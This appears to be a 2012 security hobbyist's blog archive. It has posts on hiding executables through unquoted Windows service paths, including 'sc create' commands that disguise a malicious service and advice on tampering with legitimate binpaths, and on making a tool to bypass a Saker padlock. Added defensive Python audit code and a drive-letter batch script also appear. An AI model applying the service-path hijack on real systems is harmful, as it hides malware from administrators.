<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkIWq3LL3vEEZwKw0BsTlW3ksj2I1KvZxXvhFZSF06ozg0-k0oQZYNg3yKuMYbf5t9MGGrt-zQ8p46RHDB_dk6ULKMqlerDMlFLRLi-9uGI4qf1Xo4hrpfPEq1A_AL5A-ZmgVnD7H9lGk/s1600/Stacked_Locking_Plates.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkIWq3LL3vEEZwKw0BsTlW3ksj2I1KvZxXvhFZSF06ozg0-k0oQZYNg3yKuMYbf5t9MGGrt-zQ8p46RHDB_dk6ULKMqlerDMlFLRLi-9uGI4qf1Xo4hrpfPEq1A_AL5A-ZmgVnD7H9lGk/s320/Stacked_Locking_Plates.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Here are the 4 plates that make up the locking mechanism for the shackle</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjzthdEx6xX2dqGRW758Koy85DwNna_4ZShpLLIPxjI4-311p5BdF6YsxZju7xPSI73DmaHDV8DBGtSqhrfiy4t-ZMqZ36UK0us875Vu3x4ZMVjjOreb8mj20A7vCSFH7l9HLulXQvDEU/s1600/Layed_Out_Locking_Plates.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjzthdEx6xX2dqGRW758Koy85DwNna_4ZShpLLIPxjI4-311p5BdF6YsxZju7xPSI73DmaHDV8DBGtSqhrfiy4t-ZMqZ36UK0us875Vu3x4ZMVjjOreb8mj20A7vCSFH7l9HLulXQvDEU/s320/Layed_Out_Locking_Plates.jpg" width="237" /></a></div>
<br />
<br />
<br />
So that's it. The mystery of how the Silver Bullet Bypass tool actually works is solved.<br />
<br />
Hiding Files by Exploiting Spaces in Windows Paths (published 2012-08-20, updated 2012-08-22)<br />
<br />
This is by no means a new thing. I've known about it for a really, really long time, as I'm sure a whole lot of other people have, but for some reason no one uses it. Kind of like NTFS file streams: it's neat, but not very many people make use of it.<br />
<br />
There was a Twitter post about something similar to this the other day, and it took me by surprise that not everyone knew about it and that it was being treated as a novel approach.<br />
<br />
Usually everyone talks about this in the context of privilege escalation; I use it to hide the true execution path of files. All of this requires admin-like permissions to work, so it is pretty much worthless to a regular non-privileged user.<br />
<br />
So I thought I'd write up a post on it.<br />
<br />
The basic premise is this: if you have a path with a space in it, Windows will break the path at the space and attempt to execute a file whose name is the part of the path before the space.<br />
<br />
Example: C:\Program Files\Crappy App\Whatever.exe<br />
<br />
We will assume some program is attempting to start the application at the path above. If the path is not enclosed in quotes ("), it will attempt to run C:\Program.exe, C:\Program.bat, etc., and then C:\Program Files\crappy.exe, C:\Program Files\crappy.bat, etc. Then, if it fails to find any of those, it finally launches the intended application.<br />
<br />
OMG we just figured out how to super leet hack the world...<br />
<br />
No not quite.<br />
<br />
A lesser known bit of trivia... Windows will freak the hell out if you have a program named Program.exe in the C: directory. If you restart your computer and that file exists, Windows will alert you that it exists and either instruct you to delete it or delete it automatically; I don't remember for sure. This is because the good folks at MS know this is a problem, and it is one of the reasons why, as a generic user, you don't have file create permission on the C: drive but you do have folder create permission. It is fun, though, to make a Program.exe file that just echoes hello, put it in the C: drive, and see what applications trigger it. (I'm looking at you, Notepad++)<br />
<br />
Usually when there are spaces in the path, those are all places where you, as a regular non-privileged user, don't have write permissions. The only times I've seen this be exploitable by a non-privileged user were in some custom in-house applications' registry keys and in some poorly written batch startup scripts with incorrect folder permissions. I've never seen a service with spaces in the binpath, no quotes around it, and a path writable by non-privileged users. I'm not saying it doesn't happen, but it's fairly rare from what I've seen.<br />
<br />
But back on track, I'm talking about hiding files, or really just disguising where the files that are actually being executed really are.<br />
<br />
You can use this technique to obfuscate locations in the registry, in services binpath, in batch files, all over the place.<br />
<br />
I prefer to create services rather than registry run keys for nefarious programs that need to stay persistent. Lots of people check the registry occasionally, and nothing screams suspicious like a weird registry key in the run areas.<br />
<br />
When was the last time you did a binpath= check and made sure all the paths were enclosed in quotes? When was the last time you checked all of those, compiled a list of the paths without quotes and with spaces, and then checked for like-named executables in those paths?<br />
<br />
The answer is never. <br />
<br />
So say we use this batch file to create a new service:<br />
<br />
@echo off<br />
sc create "Windows UDP Processor" binpath= "C:\program files\common files\run.exe" start= demand type= own<br />
sc description "Windows UDP Processor" "Manages Windows UDP Routing Traffic"<br />
<br />
*note: I always try to make things look as un-suspicious as possible hence the "sc description" command to add a description to the service. It's the little things kids.<br />
<br />
Since we <u>didn't</u> use escaped quotes in the bin path we end up with a binpath of this:<br />
C:\Program Files\Common Files\Run.exe<br />
Instead of<br />
"C:\Program Files\Common Files\Run.exe"<br />
<br />
(we SHOULD have used "\"C:\Program files\common files\run.exe\"" as the binpath)<br />
<br />
I've already dumped my malicious file common.exe in C:\Program Files\.<br />
<br />
When this service starts it will run C:\Program Files\common.exe not C:\Program Files\Common Files\Run.exe<br />
<br />
If the service ever gets examined, most likely the person will check Run.exe, see that it's legit / harmless, and move on, missing the real file that is being executed.<br />
<br />
Pretty sneaky right?<br />
<br />
Well, except for the part where you created a new service; that's still kinda sketchy.<br />
But if you find a legit service with spaces (more than one, usually in C:\Program Files) in the path, you can modify the binpath of the service, remove the quotes (that it should have), and then place your file in the path with the proper name. Having your malicious file start the intended executable will allay suspicion.<br />
<br />
There you have it, a legitimate service, pointing to a legitimate executable, but we're jumping in the middle and getting our file executed.<br />
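<br />
The audit asked about above (list service paths that have spaces but no quotes, then look for like-named executables along them), as an added example that is not part of the original post. It appends only `.exe` by default (pass `extensions` to cover others), treats the first prefix ending in an executable extension as the intended binary, and runs over constructed sample data; the function names and the `exists` callback are assumptions of this example.<br />

```python
import os
import re

# Constructed sample data (not from a real host): service name -> ImagePath,
# i.e. the value stored for each service under
# HKLM/SYSTEM/CurrentControlSet/Services/<name>.
SAMPLE_SERVICES = {
    "Windows UDP Processor": r"C:\Program Files\Common Files\Run.exe",
    "CrappySvc": r"C:\Program Files\Crappy App\Whatever.exe /service",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" -k netsvcs',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k LocalService",
    "ArgsOnlySvc": r"C:\Tools\agent.exe --config C:\Tools\agent.conf",
}

# Constructed stand-in for the files present on the audited disk (lower-cased).
SAMPLE_FILES = {
    r"c:\program files\common.exe",
    r"c:\program files\common files\run.exe",
    r"c:\program files\crappy app\whatever.exe",
}

# Assumption: a prefix ending in one of these is the binary the path was
# meant to start; everything after it is treated as arguments.
EXEC_EXT = re.compile(r"\.(exe|com|bat|cmd)$", re.IGNORECASE)


def interception_candidates(image_path, extensions=(".exe",)):
    """List the files that would be tried before the intended binary.

    Returns [] when the path is quoted or has no space ahead of the binary.
    """
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []  # quoted paths are taken literally, nothing to intercept
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        if tokens[i - 1] == "":
            continue  # run of consecutive spaces, no new prefix
        prefix = " ".join(tokens[:i])
        if EXEC_EXT.search(prefix):
            return candidates  # reached the intended binary
        candidates.extend(prefix + ext for ext in extensions)
    # No extension anywhere: the last prefix is the intended binary itself.
    return candidates[: -len(extensions)]


def audit(services, exists=os.path.isfile):
    """Flag every unquoted ImagePath with spaces and check for planted files."""
    findings = []
    for name in sorted(services):
        candidates = interception_candidates(services[name])
        if not candidates:
            continue
        planted = [c for c in candidates if exists(c)]
        findings.append({
            "service": name,
            "image_path": services[name],
            "candidates": candidates,
            # A file sitting at a candidate path is what actually executes.
            "planted": planted,
            "severity": "high" if planted else "review",
        })
    return findings


def sample_exists(path):
    """Existence check against the constructed file list above."""
    return path.lower() in SAMPLE_FILES


if __name__ == "__main__":
    for finding in audit(SAMPLE_SERVICES, sample_exists):
        print(f"[{finding['severity']}] {finding['service']}: {finding['image_path']}")
        for candidate in finding["candidates"]:
            mark = "PRESENT" if candidate in finding["planted"] else "absent"
            print(f"    {mark:7} {candidate}")
```

On a Windows host, pass `audit` the ImagePath values read from the Services registry key and leave `exists` at its default; any "high" finding means the file that runs is not the one the binpath appears to name.<br />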
<br />
Then all you have to do is worry about AntiVirus programs going NOM NOM NOM on your files.<br />
<br />
This works for service binpaths and registry keys; with batch files you have to go about it a little differently.<br />
<br />
With Batch files you can't have spaces in the path. End of the story.<br />
<br />
So if you tried to call C:\Program Files\Crappy App\Whatever.exe without quotes, unless there's a C:\Program.exe it's going to fail with a file not found.<br />
So you have to use the short path name for everything up to where you want it to break and execute the file.<br />
Like this:<br />
C:\Progra~1\Crappy App\Whatever.exe<br />
This would execute C:\Program Files\Crappy.exe <br />
<br />
So there you have it, a different view: using spaces to hide the true path of execution instead of using them to exploit a privilege escalation.<br />
<br />
Saker Top Security Padlock Bypass (published 2012-08-02, updated 2012-08-06)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDkwTIzzYs95IS-P5ZmG3TWWxd4Ine8L_-1D7anfSgSlniht47lggJRqwqd6a64uOj6hbL9Qsh28sh80SRoFBABcTHGs5Xj5TcDfwVSYM4Q54ZR6iJ3njfc_EBJv1pNwidImzL4gLqLjU/s1600/The+lock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDkwTIzzYs95IS-P5ZmG3TWWxd4Ine8L_-1D7anfSgSlniht47lggJRqwqd6a64uOj6hbL9Qsh28sh80SRoFBABcTHGs5Xj5TcDfwVSYM4Q54ZR6iJ3njfc_EBJv1pNwidImzL4gLqLjU/s320/The+lock.jpg" width="208" /></a></div>
I've been struggling with this lock for quite some time now. I even took it to the Lock Pick Village at Defcon and had one of the TOOOL members take a crack at it and give me some advice on it. They couldn't open it either. They did give me some solid advice on attacking serrated and spool pins through a slow and meticulous approach.<br />
<br />
This is 1 of 2 locks left standing out of the batch I picked up from eBay a while back. The Abus Diskus is the other lock I have yet to defeat. I've been working on both of them for quite a while now, and I think the Abus will fall soon.<br />
<br />
I'd taken the Saker apart in the past and noticed a bit of slop behind the cylinder between the release latch and the cylinder that I thought I might be able to use to make a bypass for this.<br />
<br />
I was right.<br />
<br />
I finally got around to it yesterday and made this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMzj72D9bpgPBFDVGBQfYgfEvSkvKuV8CtfJVx4K_tx2tXJzvCvAEL0qFCQW-Rmq3ZlRCc72B1MbAGyAvSOR1NpNykhgWQKjIbmCRzqnuqtHNqyGPKt1dpecAN7xUP3Sy8xGsrGAfI3w/s1600/Bypass+tool.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMzj72D9bpgPBFDVGBQfYgfEvSkvKuV8CtfJVx4K_tx2tXJzvCvAEL0qFCQW-Rmq3ZlRCc72B1MbAGyAvSOR1NpNykhgWQKjIbmCRzqnuqtHNqyGPKt1dpecAN7xUP3Sy8xGsrGAfI3w/s320/Bypass+tool.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sorry rest of the world, I don't have a cm/mm ruler available at home.</td></tr>
</tbody></table>
It doesn't look like much, and I assume it will only last for about 5 openings tops, but it gets the job done.<br />
<br />
I used a piece of spring steel from windshield wiper blades and a Dremel to grind it down, then some 100, 220, 320 sandpaper.<br />
The narrow part is about 1/16 of an inch wide, small enough to turn in the keyway of the lock cylinder.<br />
<br />
Here's how everything fits together.<br />
<br />
You can remove the plate that keeps the lock cylinder in place by opening the lock and unscrewing this screw at the bottom of the shackle hole. <br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdb7Ocpg-8QZGe6WEEHyDdvb8jpl8l0meKozg5iWT-qKh6xzyRr484ykMFuE-gqJAOPGvepfiJaKHCMMLMfGPC2-0E6sFPpYMr1SFvTIeCqKzQwoXYUQJFLveaeEC3oJnKMpisSxZfANY/s1600/Screw.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdb7Ocpg-8QZGe6WEEHyDdvb8jpl8l0meKozg5iWT-qKh6xzyRr484ykMFuE-gqJAOPGvepfiJaKHCMMLMfGPC2-0E6sFPpYMr1SFvTIeCqKzQwoXYUQJFLveaeEC3oJnKMpisSxZfANY/s1600/Screw.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Screw at the bottom of shackle hole</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiry0uIEg2c-mDaI8yfQzbNRazYbrl7B53VXZlMYd3GG6Xi_qbt85sMI1o53-b2k_qeawV93pVYX5mfBeAQy6ciOzR-CtHydY2ri9O8LmdlRdHr1Vac3xvAZJxPuylGrtefVCmoRIOT7Uo/s1600/Bottom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiry0uIEg2c-mDaI8yfQzbNRazYbrl7B53VXZlMYd3GG6Xi_qbt85sMI1o53-b2k_qeawV93pVYX5mfBeAQy6ciOzR-CtHydY2ri9O8LmdlRdHr1Vac3xvAZJxPuylGrtefVCmoRIOT7Uo/s320/Bottom.jpg" width="196" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bottom of lock with plate to hold cylinder in.</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin1lFn6PcYHdAcLKfUXUL_BvE6wQ0d5jgsji41vb6CSN2bbecNc8cidwp2psAJDHBm3i7nR5iR7c5xxlmiSCbXhNQ8xMAxs5R9Czhxa6q9WKFk1cAmMGl-P8N-z0Gqt5YDkBatl61uly8/s1600/Internal1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin1lFn6PcYHdAcLKfUXUL_BvE6wQ0d5jgsji41vb6CSN2bbecNc8cidwp2psAJDHBm3i7nR5iR7c5xxlmiSCbXhNQ8xMAxs5R9Czhxa6q9WKFk1cAmMGl-P8N-z0Gqt5YDkBatl61uly8/s320/Internal1.jpg" width="235" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Plate removed</td></tr>
</tbody></table>
This is the cylinder; notice the protruding portion. When the pins are aligned properly at the shear line, this turns, which then kicks over a release latch (see below).<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpDgAOTmLZjXvf-Pew3G_ezEXNew6PRzrt112eZso7ESKsiaej6PfgV9qGVMYkp4s7roJ2c2LWgFyYGy8dh4k41EULTZuKO43iQhMftcozzwTcaOElbihM_vr-dImyARD8DOtSjGMAAU/s1600/Lock.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpDgAOTmLZjXvf-Pew3G_ezEXNew6PRzrt112eZso7ESKsiaej6PfgV9qGVMYkp4s7roJ2c2LWgFyYGy8dh4k41EULTZuKO43iQhMftcozzwTcaOElbihM_vr-dImyARD8DOtSjGMAAU/s1600/Lock.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This part here turns...</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhBZ77grcCLFcbabbhoJMdf-4gXqgAWgh6PtbnpfYUzv-cqSqS7GA14LZxjrCAbCvcG39ySWaBRl1DYVoognh9ysCLLK6jbS9roTEtN_Np2xnY7tEcS9UyUKpLhCif5oZia1dait0AMS4/s1600/naked-closed.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhBZ77grcCLFcbabbhoJMdf-4gXqgAWgh6PtbnpfYUzv-cqSqS7GA14LZxjrCAbCvcG39ySWaBRl1DYVoognh9ysCLLK6jbS9roTEtN_Np2xnY7tEcS9UyUKpLhCif5oZia1dait0AMS4/s320/naked-closed.jpg" width="312" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This part here. This is in the closed position. The shackle is fully inserted in this picture</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCtAZvFJzLlKk010g1nuxeDlsj9CFtyMJnuQQeT_dE9fpSzElAEik7F2-vsh2fA3Eg6OTRL2GsZUDcFugSW4uf9N-gEsK4uzNFHefUCwWXkzTtOg-Y1VifUI4o7pEx_amWu0aWqC0gDzU/s1600/naked-open.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCtAZvFJzLlKk010g1nuxeDlsj9CFtyMJnuQQeT_dE9fpSzElAEik7F2-vsh2fA3Eg6OTRL2GsZUDcFugSW4uf9N-gEsK4uzNFHefUCwWXkzTtOg-Y1VifUI4o7pEx_amWu0aWqC0gDzU/s320/naked-open.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This is in the open position and releases the balls holding the shackle in place</td></tr>
</tbody></table>
<br />
The bypass tool can go all the way through the cylinder and fit in between the extended portion of the cylinder and the release latch.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91DoXNHFM3ALyOLfSAloY1nEgOA1bTZOv-0fvq6eAgcejgKdj1ZkYRai_qhDAaV8KJ4eHQiXE4m5vGl8f_8Ne2qn_Ti9lArzr1fx9S7JNNanWq13Vxch6FWSAHa8xJlNyO13ws5OmeIM/s1600/lock-w-bypass-2nd-view.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91DoXNHFM3ALyOLfSAloY1nEgOA1bTZOv-0fvq6eAgcejgKdj1ZkYRai_qhDAaV8KJ4eHQiXE4m5vGl8f_8Ne2qn_Ti9lArzr1fx9S7JNNanWq13Vxch6FWSAHa8xJlNyO13ws5OmeIM/s1600/lock-w-bypass-2nd-view.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Inserted and turned to actuate the release.</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-H6xTjut32vXDoFmhXdZXk9tTeLwrWskvuINP-dA6OkCrrqLH3NplPssCL46vP8GIn8hlhFu0dDUd5AF2DY6QiN0ICcvulVOe1BZl4aSz9PXHL00wY3uMAnQVzWCXci_Vc9xJRkMyDAU/s1600/body-w-bypass.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-H6xTjut32vXDoFmhXdZXk9tTeLwrWskvuINP-dA6OkCrrqLH3NplPssCL46vP8GIn8hlhFu0dDUd5AF2DY6QiN0ICcvulVOe1BZl4aSz9PXHL00wY3uMAnQVzWCXci_Vc9xJRkMyDAU/s320/body-w-bypass.jpg" width="259" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Just enough room.</td></tr>
</tbody></table>
<br />
Here are some pictures of the cylinder and the bypass tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU9VknleGqT87k2GT-HKGwo3D3Fiv4ljTO51RqfaCyH8oYCAYrygV4JD8xw9VYdvb3yjU4DMkk4cyJGT-GabH7LY4ZrbSCCiRDaLOCgDVOGAbwW2o7vA6Rw-U1kBbYNHW4m7sW4n2O3nA/s1600/lock-w-bypass-external.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU9VknleGqT87k2GT-HKGwo3D3Fiv4ljTO51RqfaCyH8oYCAYrygV4JD8xw9VYdvb3yjU4DMkk4cyJGT-GabH7LY4ZrbSCCiRDaLOCgDVOGAbwW2o7vA6Rw-U1kBbYNHW4m7sW4n2O3nA/s320/lock-w-bypass-external.jpg" width="191" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5PgKFwbpzu0bHeXfbwy5tDm9mtIHX5hyOefvM61r1I6RGP293rcaL3l9FLhJf1JOxSZ0dKgzfHwfZ5tOSphKM5_jDw9Lz52lRnMLuyCbN0gQz4b4WkCY1LBV-2y-kBbdB7XublKthbeI/s1600/lock-w-bypass-turned.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5PgKFwbpzu0bHeXfbwy5tDm9mtIHX5hyOefvM61r1I6RGP293rcaL3l9FLhJf1JOxSZ0dKgzfHwfZ5tOSphKM5_jDw9Lz52lRnMLuyCbN0gQz4b4WkCY1LBV-2y-kBbdB7XublKthbeI/s320/lock-w-bypass-turned.jpg" width="212" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyphenhyphen_KQg5-fsGSbIR-bhwcighoD9vrWJYyn3E0efdhTkCLgzHtnwURuclBJXueqSdvv_egwRd5tlNzEDI3lYMj9kuPPpwZktdrX2XjH3hnUV1lr1aAUWmpuIzv2eCDAEIIVo9b3e_A9Hnk/s1600/lock-w-bypass.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyphenhyphen_KQg5-fsGSbIR-bhwcighoD9vrWJYyn3E0efdhTkCLgzHtnwURuclBJXueqSdvv_egwRd5tlNzEDI3lYMj9kuPPpwZktdrX2XjH3hnUV1lr1aAUWmpuIzv2eCDAEIIVo9b3e_A9Hnk/s320/lock-w-bypass.jpg" width="122" /></a></div>
<br />
<br />
And here's the finished result. Insert bypass, twist with a pair of pliers, and voilà...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLOwQx3C3G1ny0ebRBSgdYqFQcSMgsZj4_Q3Uo-WfbeMBOr7fK1L6ST2i8ta4IFVs7IonipX1JJOxtHZbi6jT7_WLeAg-NRlgMFbBXUfwyOWU51d2XFoT2UHzyW9MQ7UM2Ca20MVe5pi8/s1600/Opened.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLOwQx3C3G1ny0ebRBSgdYqFQcSMgsZj4_Q3Uo-WfbeMBOr7fK1L6ST2i8ta4IFVs7IonipX1JJOxtHZbi6jT7_WLeAg-NRlgMFbBXUfwyOWU51d2XFoT2UHzyW9MQ7UM2Ca20MVe5pi8/s320/Opened.jpg" width="320" /></a></div>
<br />
<br />
Now, I've been told that this is a knockoff of an American brand lock (5000 perhaps?), which I'm sure is probably true. I haven't had the opportunity to see one, and I have no idea if this same bypass would work on it.<br />
<br />
I still won't be satisfied until I can open it with real picks, but it's always nice to have an ace in your pocket.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7776905799486744720.post-91701686918412393712012-07-10T04:52:00.001-10:002012-07-10T04:52:11.115-10:00Assign Drive Letters by Volume Name in BatchI ran across a problem with my backup software and USB drives a while back. Namely, when I changed out the drives they would sometimes randomly change the drive letter; since the backup was looking for a specific path (E:\ or whatever), it would fail. Failed backups are of no use to me. I don't want to take the time to go plug in the backup drives, then log into the server and check to make sure they have the proper drive letter assigned. It's a repetitive task that does not offer me any gained value.<br />
<br />
The biggest hassle of this is that I use diskpart. Microsoft has seen fit to have diskpart not display the same output two times in a row when running diskpart and not keeping it open. So if you run diskpart and output volumes list, then close it and run it again you're going to get two different outputs, same data, different order. Long story short you have to keep diskpart running somewhere in the background to get the output of commands to be the same.<br />
<br />
-=Script=-<br />
<br />
@echo off<br />
Set mm=%date:~4,2%<br />Set dd=%date:~7,2%<br />Set yyyy=%date:~10,4%<br />Set h=%time:~0,2%<br />if "%h:~0,1%"==" " set h=0%time:~1,1%<br />set m=%time:~3,2%<br />
start /min diskpart.exe<br />diskpart /s script.txt > output.txt<br />
for /f "tokens=3,4 delims= " %%a in (output.txt) do if /i %%b==VOLUMENAME if /i %%a==G goto end1<br />
for /f "tokens=3,4 delims= " %%a in (output.txt) do if /i %%b==VOLUMENAME if /i not %%a==G goto AssignG<br />:AssignG<br />echo Assigning G<br />for /f "tokens=1,2 delims= " %%a in ('type output.txt ^| find /i "VOLUMENAME"') do echo select %%a %%b > assigng.txt<br />echo assign letter = G >> assigng.txt<br />diskpart /s assigng.txt<br />del /f /q assigng.txt<br />echo %mm%/%dd%/%yyyy% %h%:%m% >> logs.txt<br />echo Drive letter was changed and should be assigned properly >> logs.txt<br />taskkill /f /im diskpart.exe<br />del /f /q output.txt<br />exit<br />:end1<br />echo %mm%/%dd%/%yyyy% %h%:%m% >> logs.txt<br />echo drive letter assigned properly >> logs.txt<br />taskkill /f /im diskpart.exe<br />del /f /q output.txt<br />exit<br />
<br />
<br />
The beginning part is just some log keeping I like to do, sets variables with the date and time.<br />
<br />
Then we start our background diskpart, this allows us to get consistent output from diskpart. The diskpart script (diskpart /s script.txt) is simply "list volume", basically dumping a list of all volumes currently on the system.<br />
<br />
Next we do some checks to see if VOLUMENAME (replace with the name of the volume you're looking for) matches the letter it needs to be (in this case G).<br />
If everything is proper and VOLUMENAME is assigned the drive letter G then it writes the output to the log file and exits.<br />
If something has gone awry and VOLUMENAME is not assigned to G, then it sets off to change it in the :AssignG section.<br />
<br />
AssignG sets to writing out a diskpart script to change the drive letter to G. It then starts diskpart /s assigng.txt to do the actual work, then does a bit of logging to tell me that it had to change it.<br />
Then it kills the background diskpart task, as we can't have these things running about wild.<br />
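The checks described above read the "list volume" output by whitespace token, which shifts when a volume has a label but no letter. As an added example (not part of the original post), this Python sketch reads the same output by column position and builds the diskpart script; the sample listing is constructed, and the function names and the BACKUP/ARCHIVE labels are assumptions.<br />

```python
import re

# Constructed sample of `list volume` output (built here, not captured from a
# real server). Volume 3 has a label but no drive letter assigned.
_ROW = "  {:<10}  {:^3}  {:<11}  {:<5}  {:<10}  {:>7}  {:<9}  {:<8}"


def _row(*cells):
    return _ROW.format(*cells).rstrip()


SAMPLE_OUTPUT = "\n".join([
    _row("Volume ###", "Ltr", "Label", "Fs", "Type", "Size", "Status", "Info"),
    _row("-" * 10, "-" * 3, "-" * 11, "-" * 5, "-" * 10, "-" * 7, "-" * 9, "-" * 8),
    _row("Volume 0", "D", "", "", "DVD-ROM", "0 B", "No Media", ""),
    _row("Volume 1", "C", "System", "NTFS", "Partition", "232 GB", "Healthy", "System"),
    _row("Volume 2", "E", "ARCHIVE", "NTFS", "Removable", "931 GB", "Healthy", ""),
    _row("Volume 3", "", "BACKUP", "NTFS", "Removable", "931 GB", "Healthy", ""),
])


def token_letter_and_label(line):
    """What `for /f "tokens=3,4"` sees: the 3rd and 4th whitespace tokens."""
    tokens = line.split()
    third = tokens[2] if len(tokens) > 2 else ""
    fourth = tokens[3] if len(tokens) > 3 else ""
    return third, fourth


def parse_list_volume(text):
    """Split each volume row at the columns marked by the row of dashes."""
    lines = text.splitlines()
    rule = next(i for i, line in enumerate(lines)
                if re.fullmatch(r"\s*-+(\s+-+)+\s*", line))
    spans = [m.span() for m in re.finditer(r"-+", lines[rule])]
    names = [lines[rule - 1][start:end].strip() for start, end in spans]
    volumes = []
    for line in lines[rule + 1:]:
        # diskpart marks the selected volume with a leading "*"
        if not line.lstrip(" *").startswith("Volume"):
            continue
        row = {name: line[start:end].strip()
               for name, (start, end) in zip(names, spans)}
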